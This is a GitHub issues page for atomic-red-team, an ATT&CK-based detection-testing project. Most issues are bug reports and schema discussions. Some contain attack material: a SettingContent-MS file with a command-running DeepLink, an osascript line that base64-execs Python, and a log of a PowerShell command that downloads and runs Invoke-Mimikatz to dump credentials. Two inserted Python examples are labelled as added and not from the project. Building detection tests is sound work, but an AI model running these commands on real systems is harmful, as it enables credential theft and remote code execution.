redcanaryco / atomic-red-team


Small and highly portable detection tests based on MITRE's ATT&CK.

License: MIT License

mitre mitre-attack


atomic-red-team's Issues

Simple How To Get Started

Report

Currently the execution frameworks are not intuitive to help guide someone new to Atomic to know where to begin to run tests.

So perhaps we need to add a quick pointer to each framework with a brief description.

No documentation or instructions to install at all

Clicking on any of the links in the home page literally does nothing lol. Specifically of value: Quick Start: Using Atomic Red Team to test your security

Slack channel does not allow users to join: Contact the workspace administrator for an invitation

Seems like a great project and everything, but the documentation is literally nonexistent and so there is no way to use it. Sad.

technique: .SettingContent-MS

Example of .SettingContent-MS soon to be added to the ATT&CK Matrix

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>

References:
https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8
https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
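As an added defender-side example (not part of the issue above or of the atomic-red-team project), the following parses a SettingContent-MS document and surfaces its DeepLink so a triage or hunting rule can flag a file whose DeepLink launches a shell interpreter rather than a settings target. The sample is the file quoted above reflowed, and the interpreter list is an assumption of this example.

```python
import xml.etree.ElementTree as ET
from typing import Optional

# Default namespace declared on <SearchableContent> in SettingContent-MS files.
NS = {"sc": "http://schemas.microsoft.com/Search/2013/SettingContent"}

# Constructed sample: the file quoted in the issue above, reflowed.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\\system32\\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
  </SearchableContent>
</PCSettings>
"""

# Interpreters whose presence in a DeepLink warrants analyst attention. This list is
# an assumption made for the example, not an authoritative catalogue.
SHELL_INTERPRETERS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe")


def extract_deeplink(xml_text: str) -> Optional[str]:
    """Return the DeepLink text, or None when the element is absent or empty."""
    root = ET.fromstring(xml_text)
    node = root.find(".//sc:ApplicationInformation/sc:DeepLink", NS)
    if node is None or not node.text:
        return None
    return node.text.strip()


def triage(xml_text: str) -> dict:
    """Classify one SettingContent-MS document for detection or hunting review."""
    deeplink = extract_deeplink(xml_text)
    if deeplink is None:
        return {"deeplink": None, "uses_settings_uri": False,
                "interpreter": None, "suspicious": False}
    lowered = deeplink.lower()
    interpreter = next((exe for exe in SHELL_INTERPRETERS if exe in lowered), None)
    return {
        "deeplink": deeplink,
        # ms-settings: is the Windows Settings URI scheme; a DeepLink that instead names a
        # shell interpreter with arguments is the abuse pattern described in the references.
        "uses_settings_uri": lowered.startswith("ms-settings:"),
        "interpreter": interpreter,
        "suspicious": interpreter is not None,
    }
```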

LD_PRELOAD Moved Out of Rootkit T1014

I removed the LD_PRELOAD test from the rootkit technique. I believe this is better described in T1055 Process Injection.

This is a note for me to fix this when I have time.

Cross-platform changes must be duplicated

With the current directory structure, any techniques that work on Windows, Mac, and Linux must be duplicated. This is cumbersome for when one of them changes, as then the other two must also be changed in the same way.

This could be addressed by making a Common directory which contains cross-platform resources. The READMEs in each of the OS-specific directories could then link back to resources in the Common directory.

Invoke-AtomicRedTeam - Get-AtomicTechnique

Report

There appears to be a bug in the Get-AtomicTechnique

What did you do?

Get-AtomicTechnique -Path .\atomics\T1117\T1117.yaml

Handles  NPM(K)  PM(K)  WS(K)  CPU(s)    Id  SI  ProcessName
-------  ------  -----  -----  ------    --  --  -----------
    325      19   7604  25452    0.56  5652   1  ApplicationFrameHost
    158      10   6332  11480    0.73  9048   0  audiodg
    329      16   5212  20804    0.06  8380   1  backgroundTaskHost
    174      11   2048   8140    0.03   736   1  chrome
    142      11   1972   8780    0.03  5896   1  chrome

What did you expect to happen?

I expected to create a test.

What happened instead?

In the current state, it runs Get-Process and dies.

Your Environment

Windows 10 x64 v1803

@rickardja if you have a chance can you check the code for the Get-AtomicTechnique method, or perhaps we need to update the documentation. Thanks!

Wbadmin typo.

Atomic Test #13 - wbadmin
"wbdadmin delete catalog -quiet" is not working.

What did you expect to happen?

wbdadmin should be wbadmin instead.

OS: Windows10 Enterprise.

go-atomic.rb fatal error when creating report

Hi, when executing a test in a windows system I get a failure on test report creation because the script tries to create a file with an invalid name:

 - Writing results to atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml

FATAL ERROR: Invalid argument @ rb_sysopen - atomic-test-executor-execution-2018-08-29T20:55:26Z.yaml

Consider "Variations" of each test

Report

Presently, each test is fairly static.

A recent presentation by @danielbohannon and @matthewdunwoody,

https://www.slideshare.net/DanielBohannon2/signaturesaredead-long-live-resilient-signatures

serves as a reminder that tests need to be more dynamic, lest defenders get complacent with current detections.

I propose some sort of dynamic configuration file that can be applied to a test. To change things like file name, command line arguments, etc...

Open to feedback. Just wanted to track as an issue to come back to when we have time.

errors with wildcards related to yaml-cs branch

atomic-red-team/atomics/T1002/T1002.yaml

while scanning an alias
in "", line 34, column 16:
default: *.docx
^
expected alphabetic or numeric character, but found '.'
in "", line 34, column 17:
default: *.docx
^

A bit of googling suggests that if you want to have * at the beginning you will need to put it in quotes.

Blocked Files On Windows When Atomic Test Downloaded

When you download the Atomic Repo, Windows will block many scripts. This is a normal default mechanism to prevent some material from the internet from executing.

In order to overcome this, perhaps we can add this to our Invoke-AtomicRedTeam module.

Get-ChildItem -Path 'C:\AtomicRedTeam' -Recurse | Unblock-File

YAML Schema Modify - Add attribute to check if admin/root/required

A question was posed in the Atomic Channel about checking whether or not a test requires admin (Windows) or root privileges.

I support this idea. Just need to think through where to put that check.
  • Update validation scripts
  • Retroactively update existing tests to have this added to all the existing tests.

T1086 Atomic Test #6

Report

T1086 Atomic Test #6 is false. The correct way is to first execute $Password = Read-Host -AsSecureString, then execute New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'.

And the truth is: run it with powershell, not with command_prompt. Your introduction is wrong.

What did you do?

New-LocalUser -FullName 'full_name' -Name 'user_name' -Password $password -Description 'description'

What did you expect to happen?

Successfully created an account

What happened instead?

error info:
New-LocalUser : 无法绑定参数“Password”。无法将“System.String”类型的“password”值转换为“System.Security.SecureString”类型。

Your Environment

  • Which specific operating system are you running (e.g. Windows 7 SP1 32-bit)?
    win10 1709

  • Did you run the test from an elevated or root prompt?
    yes

  • If relevant, which atomic test is this specific to?
    T1086 Atomic Test #6

  • If relevant, which execution harness are you attempting to use?
    powershell

Execute Get-keystroke script

Report

What did you do?

Run https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/Get-Keystrokes.ps1

What did you expect to happen?

Script ¿should? log keystrokes at key.log

What happened instead?

nothing

Your Environment

  • Windows 10, 64 bits
  • Did you run the test from an elevated or root prompt? Yes
  • If relevant, which atomic test is this specific to? T1056
  • If relevant, which execution harness are you attempting to use? -

T1122 COM Hijack Test CLSID is no longer viable.

Report

As reported in the Atomic Slack Channel, Test T1122 COM hijack needs a new CLSID.

{372FCE38-4324-11D0-8810-00A0C903B83C} is no longer viable.

Probably the best plan forward is to just rewrite this test to look for reg mods of existing CLSIDs

references:
https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/

https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com

T1055 Issue

I have a problem with this technique. I tested DLL(Win32/x64) files using Mavinject command but ain't working right. I used notepad.exe for ProcessID and also, disabled my anti-virus solution. Got any suggestions?

T1060 Needs Cleanup

Report

For every reg.exe add, you need a reg.exe delete to clean up the target system.

Inconsistencies In Variable Names

The Following Techniques Need to Be Corrected.
1042
1053
1065
1075
1103
1124
1191

There are inconsistencies in the input_arguments and the command property.

Example: T1042

---
attack_technique: T1042
display_name: Change Default File Association

atomic_tests:
- name: Change Default File Association
  description: |
    Change Default File Association From cmd.exe

  supported_platforms:
    - windows
  input_arguments:
    extension_to_change:
      description: File Extension To Hijack
      type: String
      default: .wav
    target_exenstion_handler:   <<<<<<<< THIS SHOULD MATCH 
      description: Thing To Open
      type: Path
      default: C:\Program Files\Windows Media Player\wmplayer.exe
  executor:
    name: command_prompt
    command: |
      cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"  <<<<<< THIS 

target_extension_handler s/b renamed to thing_to_execute Or vice versa

My recommendation is once we fix these that the validation routine be updated to check this.

YAML Schema Modify - Check dependency exists

As discussed in the Channel it would be great to have the ability to check that a dependency is on the box you are running the test from. For example LOLbins such as mavinject (T1055). In my testing (Win10 Enterprise x64) this is not always installed by default unless you have installed a click-to-run MS installer.

Dead Links - Linux Tests

In reviewing this page:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/linux-index.md

I found that nearly all the Lateral Movement tests (as well as others on the page) are pointed to a dead link:

https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTING.md

Execute All Tests with Report

Hi All,
Please forgive my newbie-ness, if this is not the correct forum for this idea or if the functionality I’m explaining below doesn’t already exist, please let me know. I noticed the “Generate All Tests” code on this page: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks/Invoke-AtomicRedTeam

I am looking for a simple command to run many or all tests applicable by OS that creates a test report to compare to. I’m thinking there are many people like me who just want to quickly test my shiny new detection method (EDR tool, sysmon setup or SIEM integration) by running one simple command. I’m really hoping the command will output a report. The report can be then used to support a manual comparison to shiny new detection method on a wide scale of techniques post-execution. I think having this functionality easily accessible and documented will be great.

The command should:
• Run a list of tests, all tests by tactic or all tests (default).
• Insert some delay time in between each command execution, perhaps 1 minute default. This will allow for greater confidence in detection when comparing shiny new detection method to test output report.
• *Add command execution validation (Ex/ T1117 did a new instance of calc.exe execute?) Being so new to the framework, I’m assuming not all techniques pop calc.exe.
• Output a CSV or XML report of actions. Report Fields:

  • From Command/Script: Hostname, Host IP, Execution Date/Time
  • From YAML: attack_technique, display_name, name, description, input arguments, executor, name, command
  • End users can later add custom fields like “Detected”, “Detected by; SIEM, EDR, etc..”, or Maturity Level to track progress.

• Include techniques with missing tests as “No Atomic Test Available – Please submit a test! https://github.com/redcanaryco/atomic-red-team/blob/master/docs/contributing.md#how-to-contribute” in output
• Summary: Number of tests completed/successful, failed, not applicable, missing tests (by tactic and total)
• Can be user interactive or non-interactive to bypass prompts

Questions for community:

  1. What flaws are there with this concept?
  2. Does this functionality already exist?
  3. *Is there a concept of confirming a test executor’s command as success or failed? (like STDERR)

I noticed the code Invoke-AtomicRedTeam\Public\Invoke-AtomicTest.ps1
has a “foreach ($technique in $AtomicTechnique)” and “foreach ($test in $technique.atomic_tests)” loops but it is not intuitive to how to run and I don’t see a report output option. See #432

Thank you!

yaml files pass a dict to the command instead of component of the dict

Example: T1002
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml

input arguments are:

input_arguments:
    input_file:
      description: Path that should be compressed into our output file
      type: Path
      default: C:\*

the input_file variable then contains the following based on parsing the yaml:
{'description': 'Path that should be compressed into our output file', 'type': 'Path', 'default': 'C:\\*'}

command then takes:

executor:
    name: powershell
    command: |
      dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}

thus you are passing a dict to the command part

I assume it should be something like #{input_file.default} or #{input_file['default']}, whatever makes sense here.
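Both the placeholder/argument mismatch reported under "Inconsistencies In Variable Names" (T1042) and the dict-instead-of-default substitution in this issue (T1002) are what a validation pass over the YAML should catch. The following is an added example, not code from the atomic-red-team project or its execution frameworks: the two tests are represented as the dicts PyYAML would load from the YAML quoted above, and the T1002 test name and output_file default are constructed placeholders.

```python
import re
from typing import Dict, List, Optional, Tuple

# Matches the #{name} placeholders used in atomic-red-team executor commands.
PLACEHOLDER = re.compile(r"#\{([A-Za-z0-9_]+)\}")

# Constructed: the T1042 test quoted in the issue above, as PyYAML would load it
# (argument key and command placeholder deliberately disagree, as in the report).
T1042_TEST = {
    "name": "Change Default File Association",
    "input_arguments": {
        "extension_to_change": {"description": "File Extension To Hijack", "type": "String", "default": ".wav"},
        "target_exenstion_handler": {"description": "Thing To Open", "type": "Path",
                                     "default": r"C:\Program Files\Windows Media Player\wmplayer.exe"},
    },
    "executor": {"name": "command_prompt",
                 "command": 'cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"\n'},
}

# Constructed: the T1002 fragment from the issue above; the test name and the
# output_file default are placeholders, not values from the project's YAML.
T1002_TEST = {
    "name": "Compress Data with PowerShell",
    "input_arguments": {
        "input_file": {"description": "Path that should be compressed into our output file",
                       "type": "Path", "default": r"C:\*"},
        "output_file": {"description": "Archive to write", "type": "Path",
                        "default": r"C:\Temp\constructed-example.zip"},
    },
    "executor": {"name": "powershell",
                 "command": "dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}\n"},
}


def check_arguments(test: dict) -> Tuple[List[str], List[str]]:
    """Return (placeholders with no input_argument, input_arguments never referenced)."""
    used = set(PLACEHOLDER.findall(test["executor"]["command"]))
    declared = set(test.get("input_arguments") or {})
    return sorted(used - declared), sorted(declared - used)


def validate_tests(tests: List[dict]) -> Dict[str, List[str]]:
    """Map test name -> problems, for the validation routine the issue asks for."""
    problems: Dict[str, List[str]] = {}
    for test in tests:
        undefined, unused = check_arguments(test)
        msgs = [f"command uses #{{{n}}} but input_arguments has no '{n}'" for n in undefined]
        msgs += [f"input argument '{n}' is never used in the command" for n in unused]
        if msgs:
            problems[test["name"]] = msgs
    return problems


def render_command(test: dict, overrides: Optional[Dict[str, str]] = None) -> str:
    """Expand each #{name} to that argument's `default` (or a caller override), never the
    argument's whole mapping; an undefined name raises instead of leaking into the command."""
    args = test.get("input_arguments") or {}
    overrides = overrides or {}

    def expand(match):
        name = match.group(1)
        if name not in args:
            raise KeyError(f"command references undefined input argument #{{{name}}}")
        return str(overrides.get(name, args[name]["default"]))

    return PLACEHOLDER.sub(expand, test["executor"]["command"])
```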

Update Matrix Build

We identified that the matrices were out of date (missing T1220, for example) and it is possibly caused by the ATT&CK API change.

T1155

Report

What did you do?

Ran test T1155 and got this error, -sh: syntax error near unexpected token `'ignore''
osascript "do shell script "echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));" | python &""

What did you expect to happen?

Atomic test T1155 executes

What happened instead?

-sh: syntax error near unexpected token `'ignore''

Your Environment

MacOS High Sierra version 10.13.6

  • Did you run the test from an elevated or root prompt? NO
  • If relevant, which atomic test is this specific to? T1155 for MacOS
  • If relevant, which execution harness are you attempting to use?

Chain Reactions result in 404 pulling down binaries

Report

What did you do?

Run 'chain_reaction_DragonsTail.ps1'

What did you expect to happen?

Receive all SUCCESS notifications

What happened instead?

PS C:\Users<redacted>\Desktop> .\chain_reaction_DragonsTail.ps1
SUCCESS: The scheduled task "Atomic Testing" has successfully been created.
SUCCESS: Attempted to run the scheduled task "Atomic Testing".
SUCCESS: The scheduled task "Atomic Testing" was successfully deleted.
powershell.exe : Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At C:\Users<redacted>\Desktop\chain_reaction_DragonsTail.ps1:21 char:1
+ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https: ...
    + CategoryInfo          : NotSpecified: (Exception calli...04) Not Found.":String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString('https://raw.githubuser ...
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:157
+ ... aster/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCr ...
+                                               ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

Your Environment

Windows 10 64-bit
https://github.com/redcanaryco/atomic-red-team/blob/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat

Callouts to this repo for binaries result in 404.

Complete Tests, Including Cleanup

I think each test needs to provide a cleanup mechanism. We can decide whether to include that in the executor.command or as a separate yaml property.

Example: T1050 Creates a Service, but makes no attempt to clean up.

I propose for T1050 something like this.

sc.exe create
sc.exe start
sc.exe stop
sc.exe delete

To be complete each test should stand alone.

I think this is best practice. @brianebeyer , I would be interested in your thoughts here.

handling multi line commands in yaml files

per request moving this over from twitter

ref:
https://twitter.com/carnal0wnage/status/994594132747317248

CG
are you guys planning to support multiple commands in a single command item? T1105.yaml has multiple commands. perhaps they could each be an element in a list (like you are doing supported_platforms). right now you'd/I have to account for # and blank lines

BB
Take a look at https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/t1089/t1089.yaml … - isn’t completely in line with new spec yet but you’ll see the command is multiline.

Our thought was “write your commands like you’d write them in a bat/powershell/sh script and executors can invoke them as if a single script”

CG
hmmm how do you anticipate the executor invoking those? taking the blob and writing to a file and exec'ing? how would i exec all that if i only had ssh?

BB
For ssh, I think a heredoc works. Imagine the ssh+bash executor doing

ssh user@host bash <<'EOF'
<< the contents of the executor.command >>
EOF
